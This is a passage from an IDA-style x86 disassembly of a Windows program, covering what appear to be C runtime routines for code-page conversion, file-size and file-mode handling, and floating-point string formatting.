		call	ds:off_41E198

loc_410868:				; CODE XREF: sub_41077D+45j
		push	3
		call	sub_4080AA
		int	3		; Trap to Debugger
sub_41077D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410870	proc near		; CODE XREF: sub_40C517+25Ap
					; sub_40C8FC+150p

var_C		= byte ptr -0Ch
var_6		= byte ptr -6
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	6
		lea	eax, [ebp+var_C]
		push	eax
		push	1004h
		push	[ebp+arg_0]
		mov	[ebp+var_6], 0
		call	ds:off_41E054
		test	eax, eax
		jnz	short loc_4108A1
		or	eax, 0FFFFFFFFh
		jmp	short loc_4108AB
; ---------------------------------------------------------------------------

loc_4108A1:				; CODE XREF: sub_410870+2Aj
		lea	eax, [ebp+var_C]
		push	eax
		call	sub_404365
		pop	ecx

loc_4108AB:				; CODE XREF: sub_410870+2Fj
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_410870	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4108B7	proc near		; CODE XREF: sub_40C517+285p
					; sub_40C517+336p ...

var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 34h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_10]
		mov	[ebp+var_28], eax
		mov	eax, [ebp+arg_C]
		push	ebx
		mov	[ebp+var_30], eax
		mov	eax, [eax]
		push	esi
		mov	[ebp+var_24], eax
		mov	eax, [ebp+arg_0]
		push	edi
		xor	edi, edi
		cmp	eax, [ebp+arg_4]
		mov	[ebp+var_34], ecx
		mov	[ebp+var_20], edi
		mov	[ebp+var_2C], edi
		jz	loc_410A54
		mov	esi, ds:dword_41E1B4
		lea	ecx, [ebp+var_18]
		push	ecx
		push	eax
		call	esi	; GetCPInfo
		test	eax, eax
		mov	ebx, ds:dword_41E0A0
		jz	short loc_41096A
		cmp	[ebp+var_18], 1
		jnz	short loc_41096A
		lea	eax, [ebp+var_18]
		push	eax
		push	[ebp+arg_4]
		call	esi	; GetCPInfo
		test	eax, eax
		jz	short loc_41096A
		cmp	[ebp+var_18], 1
		jnz	short loc_41096A
		mov	esi, [ebp+var_24]
		cmp	esi, 0FFFFFFFFh
		mov	[ebp+var_2C], 1
		jnz	short loc_410940
		push	[ebp+var_28]
		call	sub_4046F0
		mov	esi, eax
		pop	ecx
		inc	esi

loc_410940:				; CODE XREF: sub_4108B7+7Bj
		cmp	esi, edi

loc_410942:				; CODE XREF: sub_4108B7+C6j
		jle	short loc_41099F
		cmp	esi, 7FFFFFF0h
		ja	short loc_41099F
		lea	eax, [esi+esi+8]
		cmp	eax, 400h
		ja	short loc_410986
		call	sub_410A70
		mov	eax, esp
		cmp	eax, edi
		jz	short loc_41099A
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_410997
; ---------------------------------------------------------------------------

loc_41096A:				; CODE XREF: sub_4108B7+53j
					; sub_4108B7+59j ...
		push	edi
		push	edi
		push	[ebp+var_24]
		push	[ebp+var_28]
		push	1
		push	[ebp+arg_0]
		call	ebx	; MultiByteToWideChar
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_410942

loc_41097F:				; CODE XREF: sub_4108B7+EEj
		xor	eax, eax
		jmp	loc_410A57
; ---------------------------------------------------------------------------

loc_410986:				; CODE XREF: sub_4108B7+9Ej
		push	eax
		call	sub_403C6E
		cmp	eax, edi
		pop	ecx
		jz	short loc_41099A
		mov	dword ptr [eax], 0DDDDh

loc_410997:				; CODE XREF: sub_4108B7+B1j
		add	eax, 8

loc_41099A:				; CODE XREF: sub_4108B7+A9j
					; sub_4108B7+D8j
		mov	[ebp+var_1C], eax
		jmp	short loc_4109A2
; ---------------------------------------------------------------------------

loc_41099F:				; CODE XREF: sub_4108B7:loc_410942j
					; sub_4108B7+93j
		mov	[ebp+var_1C], edi

loc_4109A2:				; CODE XREF: sub_4108B7+E6j
		cmp	[ebp+var_1C], edi
		jz	short loc_41097F
		lea	eax, [esi+esi]
		push	eax
		push	edi
		push	[ebp+var_1C]
		call	sub_408130
		add	esp, 0Ch
		push	esi
		push	[ebp+var_1C]
		push	[ebp+var_24]
		push	[ebp+var_28]
		push	1
		push	[ebp+arg_0]
		call	ebx	; MultiByteToWideChar
		test	eax, eax
		jz	short loc_410A4B
		mov	ebx, [ebp+var_34]
		cmp	ebx, edi
		jz	short loc_4109F0
		push	edi
		push	edi
		push	[ebp+arg_14]
		push	ebx
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ds:dword_41E134	; WideCharToMultiByte
		test	eax, eax
		jz	short loc_410A4B
		mov	[ebp+var_20], ebx
		jmp	short loc_410A4B
; ---------------------------------------------------------------------------

loc_4109F0:				; CODE XREF: sub_4108B7+11Aj
		cmp	[ebp+var_2C], edi
		mov	ebx, ds:dword_41E134
		jnz	short loc_410A0F
		push	edi
		push	edi
		push	edi
		push	edi
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ebx	; WideCharToMultiByte
		mov	esi, eax
		cmp	esi, edi
		jz	short loc_410A4B

loc_410A0F:				; CODE XREF: sub_4108B7+142j
		push	esi
		push	1
		call	sub_407D3A
		cmp	eax, edi
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		jz	short loc_410A4B
		push	edi
		push	edi
		push	esi
		push	eax
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ebx	; WideCharToMultiByte
		cmp	eax, edi
		jnz	short loc_410A40
		push	[ebp+var_20]
		call	sub_403B91
		pop	ecx
		mov	[ebp+var_20], edi
		jmp	short loc_410A4B
; ---------------------------------------------------------------------------

loc_410A40:				; CODE XREF: sub_4108B7+179j
		cmp	[ebp+var_24], 0FFFFFFFFh
		jz	short loc_410A4B
		mov	ecx, [ebp+var_30]
		mov	[ecx], eax

loc_410A4B:				; CODE XREF: sub_4108B7+113j
					; sub_4108B7+132j ...
		push	[ebp+var_1C]
		call	sub_40C4FC
		pop	ecx

loc_410A54:				; CODE XREF: sub_4108B7+38j
		mov	eax, [ebp+var_20]

loc_410A57:				; CODE XREF: sub_4108B7+CAj
		lea	esp, [ebp-40h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_4108B7	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_410A70	proc near		; CODE XREF: sub_40C517+F3p
					; sub_40C517+1B1p ...

arg_0		= byte ptr  4

		push	ecx
		lea	ecx, [esp+4+arg_0]
		sub	ecx, eax
		and	ecx, 0Fh
		add	eax, ecx
		sbb	ecx, ecx
		or	eax, ecx
		pop	ecx
		jmp	sub_4119C0
sub_410A70	endp

; ---------------------------------------------------------------------------
		push	ecx
		lea	ecx, [esp+8]
		sub	ecx, eax
		and	ecx, 7
		add	eax, ecx
		sbb	ecx, ecx
		or	eax, ecx
		pop	ecx
		jmp	sub_4119C0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410A9C	proc near		; CODE XREF: sub_40D41A+2A1p
					; sub_40D41A+2C1p

var_10		= byte ptr -10h
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= word ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		xor	esi, esi
		cmp	dword_425218, esi
		jz	short loc_410B05
		cmp	dword_425224, 0FFFFFFFEh
		jnz	short loc_410AC5
		call	sub_4119EB

loc_410AC5:				; CODE XREF: sub_410A9C+22j
		mov	eax, dword_425224
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_410AD5

loc_410ACF:				; CODE XREF: sub_410A9C+56j
					; sub_410A9C+61j ...
		or	ax, 0FFFFh
		jmp	short loc_410B45
; ---------------------------------------------------------------------------

loc_410AD5:				; CODE XREF: sub_410A9C+31j
		push	esi
		lea	ecx, [ebp+var_10]
		push	ecx
		push	1
		lea	ecx, [ebp+arg_0]
		push	ecx
		push	eax
		call	ds:off_41E0A8
		test	eax, eax
		jnz	short loc_410B52
		cmp	dword_425218, 2
		jnz	short loc_410ACF
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_410ACF
		mov	dword_425218, esi

loc_410B05:				; CODE XREF: sub_410A9C+19j
		push	esi
		push	esi
		push	5
		lea	eax, [ebp+var_C]
		push	eax
		push	1
		lea	eax, [ebp+arg_0]
		push	eax
		push	esi
		call	ds:off_41E0AC
		push	eax
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	ecx, dword_425224
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_410ACF
		push	esi
		lea	edx, [ebp+var_10]
		push	edx
		push	eax
		lea	eax, [ebp+var_C]
		push	eax
		push	ecx
		call	ds:off_41E0B0
		test	eax, eax
		jz	short loc_410ACF

loc_410B41:				; CODE XREF: sub_410A9C+C0j
		mov	ax, [ebp+arg_0]

loc_410B45:				; CODE XREF: sub_410A9C+37j
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_410B52:				; CODE XREF: sub_410A9C+4Dj
		mov	dword_425218, 1
		jmp	short loc_410B41
sub_410A9C	endp

; ---------------------------------------------------------------------------
		push	2
		call	sub_407E1D
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410B67	proc near		; CODE XREF: sub_40E632+36Fp

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	1
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], ebx
		call	sub_40D27E
		mov	[ebp+var_18], eax
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_14], edx
		jz	short loc_410BED
		push	2
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		call	sub_40D27E
		mov	ecx, eax
		and	ecx, edx
		add	esp, 10h
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_410BED
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_8]
		sub	esi, eax
		sbb	edi, edx
		js	loc_410C82
		jg	short loc_410BC6
		cmp	esi, ebx
		jbe	loc_410C82

loc_410BC6:				; CODE XREF: sub_410B67+55j
		mov	ebx, 1000h
		push	ebx
		push	8
		call	ds:dword_41E0FC	; GetProcessHeap
		push	eax
		call	ds:dword_41E110	; RtlAllocateHeap
		test	eax, eax
		mov	[ebp+var_4], eax
		jnz	short loc_410BF9
		call	sub_405D93
		mov	dword ptr [eax], 0Ch

loc_410BED:				; CODE XREF: sub_410B67+2Bj
					; sub_410B67+43j ...
		call	sub_405D93
		mov	eax, [eax]

loc_410BF4:				; CODE XREF: sub_410B67+1AFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_410BF9:				; CODE XREF: sub_410B67+79j
		push	8000h
		push	[ebp+arg_0]
		call	sub_410D8D
		pop	ecx
		pop	ecx
		mov	[ebp+var_8], eax

loc_410C0B:				; CODE XREF: sub_410B67+CFj
					; sub_410B67+D3j
		test	edi, edi
		jl	short loc_410C19
		jg	short loc_410C15
		cmp	esi, ebx
		jb	short loc_410C19

loc_410C15:				; CODE XREF: sub_410B67+A8j
		mov	eax, ebx
		jmp	short loc_410C1B
; ---------------------------------------------------------------------------

loc_410C19:				; CODE XREF: sub_410B67+A6j
					; sub_410B67+ACj
		mov	eax, esi

loc_410C1B:				; CODE XREF: sub_410B67+B0j
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_0]
		call	sub_40D41A
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	short loc_410C65
		cdq
		sub	esi, eax
		sbb	edi, edx
		js	short loc_410C3C
		jg	short loc_410C0B
		test	esi, esi
		ja	short loc_410C0B

loc_410C3C:				; CODE XREF: sub_410B67+CDj
		mov	esi, [ebp+var_10]

loc_410C3F:				; CODE XREF: sub_410B67+119j
		push	[ebp+var_8]
		push	[ebp+arg_0]
		call	sub_410D8D
		pop	ecx
		pop	ecx
		push	[ebp+var_4]
		push	0
		call	ds:dword_41E0FC	; GetProcessHeap
		push	eax
		call	ds:dword_41E108	; RtlFreeHeap
		xor	ebx, ebx
		jmp	loc_410CEB
; ---------------------------------------------------------------------------

loc_410C65:				; CODE XREF: sub_410B67+C6j
		call	sub_405DA6
		cmp	dword ptr [eax], 5
		jnz	short loc_410C7A
		call	sub_405D93
		mov	dword ptr [eax], 0Dh

loc_410C7A:				; CODE XREF: sub_410B67+106j
		or	esi, 0FFFFFFFFh
		mov	[ebp+var_C], esi
		jmp	short loc_410C3F
; ---------------------------------------------------------------------------

loc_410C82:				; CODE XREF: sub_410B67+4Fj
					; sub_410B67+59j
		cmp	edi, ebx
		jg	short loc_410CF7
		jl	short loc_410C8C
		cmp	esi, ebx
		jnb	short loc_410CF7

loc_410C8C:				; CODE XREF: sub_410B67+11Fj
		push	ebx
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D27E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_410BED
		push	[ebp+arg_0]
		call	sub_40F33D
		pop	ecx
		push	eax
		call	ds:off_41E0A4
		neg	eax
		sbb	eax, eax
		neg	eax
		dec	eax
		cdq
		mov	[ebp+var_10], eax
		and	eax, edx
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_C], edx
		jnz	short loc_410CF7
		call	sub_405D93
		mov	dword ptr [eax], 0Dh
		call	sub_405DA6
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[esi], eax
		mov	esi, [ebp+var_10]

loc_410CEB:				; CODE XREF: sub_410B67+F9j
		and	esi, [ebp+var_C]
		cmp	esi, 0FFFFFFFFh
		jz	loc_410BED

loc_410CF7:				; CODE XREF: sub_410B67+11Dj
					; sub_410B67+123j ...
		push	ebx
		push	[ebp+var_14]
		push	[ebp+var_18]
		push	[ebp+arg_0]
		call	sub_40D27E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_410BED
		xor	eax, eax
		jmp	loc_410BF4
sub_410B67	endp


; =============== S U B	R O U T	I N E =======================================



sub_410D1B	proc near		; CODE XREF: sub_40E632+322p
					; sub_40E632+37Fp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		mov	esi, [esp+4+arg_0]
		push	esi
		call	sub_40F33D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_410D3C
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_410D3C:				; CODE XREF: sub_410D1B+Fj
		push	edi
		push	[esp+8+arg_8]
		push	0
		push	[esp+10h+arg_4]
		push	eax
		call	ds:off_41E074
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_410D5D
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		jmp	short loc_410D5F
; ---------------------------------------------------------------------------

loc_410D5D:				; CODE XREF: sub_410D1B+38j
		xor	eax, eax

loc_410D5F:				; CODE XREF: sub_410D1B+40j
		test	eax, eax
		jz	short loc_410D6F
		push	eax
		call	sub_405DB9
		pop	ecx
		or	eax, 0FFFFFFFFh
		jmp	short loc_410D8A
; ---------------------------------------------------------------------------

loc_410D6F:				; CODE XREF: sub_410D1B+46j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437700[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FDh
		mov	eax, edi

loc_410D8A:				; CODE XREF: sub_410D1B+52j
		pop	edi
		pop	esi
		retn
sub_410D1B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410D8D	proc near		; CODE XREF: sub_410B67+9Ap
					; sub_410B67+DEp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		mov	edx, [ebp+arg_0]
		mov	eax, edx
		sar	eax, 5
		and	edx, 1Fh
		imul	edx, 28h
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		lea	esi, ds:437700h[eax*4]
		mov	eax, [esi]
		lea	ecx, [eax+edx]
		movzx	eax, byte ptr [ecx+4]
		and	eax, 80h
		mov	[ebp+arg_0], eax
		mov	al, [ecx+24h]
		add	al, al
		movsx	eax, al
		push	edi
		mov	edi, 4000h
		sar	eax, 1
		cmp	ebx, edi
		jz	short loc_410E1F
		cmp	ebx, 8000h
		jz	short loc_410E19
		cmp	ebx, 10000h
		jz	short loc_410E05
		cmp	ebx, 20000h
		jz	short loc_410E05
		cmp	ebx, 40000h
		jnz	short loc_410E2C
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		mov	dl, [ecx]
		and	dl, 81h
		or	dl, 1

loc_410E01:				; CODE XREF: sub_410D8D+8Aj
		mov	[ecx], dl
		jmp	short loc_410E2C
; ---------------------------------------------------------------------------

loc_410E05:				; CODE XREF: sub_410D8D+50j
					; sub_410D8D+58j
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		mov	dl, [ecx]
		and	dl, 82h
		or	dl, 2
		jmp	short loc_410E01
; ---------------------------------------------------------------------------

loc_410E19:				; CODE XREF: sub_410D8D+48j
		and	byte ptr [ecx+4], 7Fh
		jmp	short loc_410E2C
; ---------------------------------------------------------------------------

loc_410E1F:				; CODE XREF: sub_410D8D+40j
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		and	byte ptr [ecx],	80h

loc_410E2C:				; CODE XREF: sub_410D8D+60j
					; sub_410D8D+76j ...
		cmp	[ebp+arg_0], 0
		jnz	short loc_410E39
		mov	eax, 8000h
		jmp	short loc_410E44
; ---------------------------------------------------------------------------

loc_410E39:				; CODE XREF: sub_410D8D+A3j
		neg	eax
		sbb	eax, eax
		and	eax, 0C000h
		add	eax, edi

loc_410E44:				; CODE XREF: sub_410D8D+AAj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_410D8D	endp


; =============== S U B	R O U T	I N E =======================================



sub_410E49	proc near		; CODE XREF: sub_40E632+40p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_410E71
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_410E71:				; CODE XREF: sub_410E49+9j
		mov	ecx, dword_4288C0
		mov	[eax], ecx
		xor	eax, eax
		pop	esi
		retn
sub_410E49	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410E7D	proc near		; CODE XREF: sub_410FF8+6p
					; DATA XREF: sub_40FCCB+55o ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	esi, [ebp+arg_0]
		movsx	eax, byte ptr [esi]
		push	eax
		call	sub_405D31
		cmp	eax, 65h
		jmp	short loc_410EAC
; ---------------------------------------------------------------------------

loc_410EA0:				; CODE XREF: sub_410E7D+30j
		inc	esi
		movzx	eax, byte ptr [esi]
		push	eax
		call	sub_40F73F
		test	eax, eax

loc_410EAC:				; CODE XREF: sub_410E7D+21j
		pop	ecx
		jnz	short loc_410EA0
		movsx	eax, byte ptr [esi]
		push	eax
		call	sub_405D31
		cmp	eax, 78h
		pop	ecx
		jnz	short loc_410EC0
		inc	esi
		inc	esi

loc_410EC0:				; CODE XREF: sub_410E7D+3Fj
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		mov	al, [esi]
		mov	cl, [ecx]
		mov	[esi], cl
		inc	esi

loc_410ED2:				; CODE XREF: sub_410E7D+60j
		mov	cl, [esi]
		mov	[esi], al
		mov	al, cl
		mov	cl, [esi]
		inc	esi
		test	cl, cl
		jnz	short loc_410ED2
		cmp	[ebp+var_4], cl
		pop	esi
		jz	short locret_410EEC
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

locret_410EEC:				; CODE XREF: sub_410E7D+66j
		leave
		retn
sub_410E7D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410EEE	proc near		; CODE XREF: sub_411006+6p
					; DATA XREF: sub_40FCCB+4Bo ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+arg_0]
		mov	cl, [eax]
		test	cl, cl
		mov	esi, [ebp+var_10]
		jz	short loc_410F21
		mov	edx, [esi+0BCh]
		mov	edx, [edx]
		mov	dl, [edx]

loc_410F16:				; CODE XREF: sub_410EEE+31j
		cmp	cl, dl
		jz	short loc_410F21
		inc	eax
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_410F16

loc_410F21:				; CODE XREF: sub_410EEE+1Cj
					; sub_410EEE+2Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jz	short loc_410F5E
		jmp	short loc_410F35
; ---------------------------------------------------------------------------

loc_410F2A:				; CODE XREF: sub_410EEE+4Bj
		cmp	cl, 65h
		jz	short loc_410F3B
		cmp	cl, 45h
		jz	short loc_410F3B
		inc	eax

loc_410F35:				; CODE XREF: sub_410EEE+3Aj
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_410F2A

loc_410F3B:				; CODE XREF: sub_410EEE+3Fj
					; sub_410EEE+44j
		mov	edx, eax

loc_410F3D:				; CODE XREF: sub_410EEE+53j
		dec	eax
		cmp	byte ptr [eax],	30h
		jz	short loc_410F3D
		mov	ecx, [esi+0BCh]
		mov	ecx, [ecx]
		push	ebx
		mov	bl, [eax]
		cmp	bl, [ecx]
		pop	ebx
		jnz	short loc_410F54
		dec	eax

loc_410F54:				; CODE XREF: sub_410EEE+63j
					; sub_410EEE+6Ej
		mov	cl, [edx]
		inc	eax
		inc	edx
		test	cl, cl
		mov	[eax], cl
		jnz	short loc_410F54

loc_410F5E:				; CODE XREF: sub_410EEE+38j
		cmp	[ebp+var_4], 0
		pop	esi
		jz	short locret_410F6C
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

locret_410F6C:				; CODE XREF: sub_410EEE+75j
		leave
		retn
sub_410EEE	endp

; ---------------------------------------------------------------------------
word_410F6E	dw 0EED9h		; DATA XREF: sub_40FCCB+28o
					; .data:off_424F90o
		dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410F84	proc near		; CODE XREF: sub_410FC4+Ep
					; DATA XREF: sub_40FCCB+41o ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		cmp	[ebp+arg_0], 0
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		jz	short loc_410FAE
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_411A6D
		mov	ecx, [ebp+var_8]
		mov	eax, [ebp+arg_4]
		mov	[eax], ecx
		mov	ecx, [ebp+var_4]
		mov	[eax+4], ecx
		jmp	short loc_410FBF
; ---------------------------------------------------------------------------

loc_410FAE:				; CODE XREF: sub_410F84+Fj
		lea	eax, [ebp+arg_0]
		push	eax
		call	sub_411B13
		mov	eax, [ebp+arg_4]
		mov	ecx, [ebp+arg_0]
		mov	[eax], ecx

loc_410FBF:				; CODE XREF: sub_410F84+28j
		add	esp, 0Ch
		leave
		retn
sub_410F84	endp


; =============== S U B	R O U T	I N E =======================================



sub_410FC4	proc near		; DATA XREF: sub_40FCCB+14o
					; .data:off_424F88o

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_410F84
		add	esp, 10h
		retn
sub_410FC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_410FDB	proc near		; CODE XREF: sub_411014+88p
					; sub_4115DE+8Ap ...
		test	edi, edi
		push	esi
		mov	esi, eax
		jz	short loc_410FF6
		push	esi
		call	sub_4046F0
		inc	eax
		push	eax
		push	esi
		add	esi, edi
		push	esi
		call	sub_407930
		add	esp, 10h

loc_410FF6:				; CODE XREF: sub_410FDB+5j
		pop	esi
		retn
sub_410FDB	endp


; =============== S U B	R O U T	I N E =======================================



sub_410FF8	proc near		; DATA XREF: sub_40FCCB+1Eo
					; .data:off_424F8Co

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_410E7D
		pop	ecx
		pop	ecx
		retn
sub_410FF8	endp


; =============== S U B	R O U T	I N E =======================================



sub_411006	proc near		; DATA XREF: sub_40FCCB+Ao
					; .data:off_424F84o

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_410EEE
		pop	ecx
		pop	ecx
		retn
sub_411006	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411014	proc near		; CODE XREF: sub_411181+B7p
					; sub_41178C+E1p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_14]
		lea	ecx, [ebp+var_10]
		mov	ebx, eax
		call	sub_402CAD
		xor	esi, esi
		cmp	ebx, esi
		jnz	short loc_41105B

loc_411030:				; CODE XREF: sub_411014+4Aj
		call	sub_405D93
		push	16h

loc_411037:				; CODE XREF: sub_411014+67j
		pop	edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	[eax], edi
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], 0
		jz	short loc_411054
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411054:				; CODE XREF: sub_411014+37j
		mov	eax, edi
		jmp	loc_41117C
; ---------------------------------------------------------------------------

loc_41105B:				; CODE XREF: sub_411014+1Aj
		cmp	[ebp+arg_0], esi
		jbe	short loc_411030
		cmp	[ebp+arg_4], esi
		jle	short loc_41106A
		mov	eax, [ebp+arg_4]
		jmp	short loc_41106C
; ---------------------------------------------------------------------------

loc_41106A:				; CODE XREF: sub_411014+4Fj
		xor	eax, eax

loc_41106C:				; CODE XREF: sub_411014+54j
		add	eax, 9
		cmp	[ebp+arg_0], eax
		ja	short loc_41107D
		call	sub_405D93
		push	22h
		jmp	short loc_411037
; ---------------------------------------------------------------------------

loc_41107D:				; CODE XREF: sub_411014+5Ej
		cmp	[ebp+arg_10], 0
		jz	short loc_4110A1
		mov	edx, [ebp+arg_C]
		xor	eax, eax
		cmp	[ebp+arg_4], esi
		setnle	al
		xor	ecx, ecx
		cmp	dword ptr [edx], 2Dh
		setz	cl
		mov	edi, eax
		add	ecx, ebx
		mov	eax, ecx
		call	sub_410FDB

loc_4110A1:				; CODE XREF: sub_411014+6Dj
		mov	edi, [ebp+arg_C]
		cmp	dword ptr [edi], 2Dh
		mov	esi, ebx
		jnz	short loc_4110B1
		mov	byte ptr [ebx],	2Dh
		lea	esi, [ebx+1]

loc_4110B1:				; CODE XREF: sub_411014+95j
		cmp	[ebp+arg_4], 0
		jle	short loc_4110CF
		lea	eax, [esi+1]
		mov	cl, [eax]
		mov	[esi], cl
		mov	esi, eax
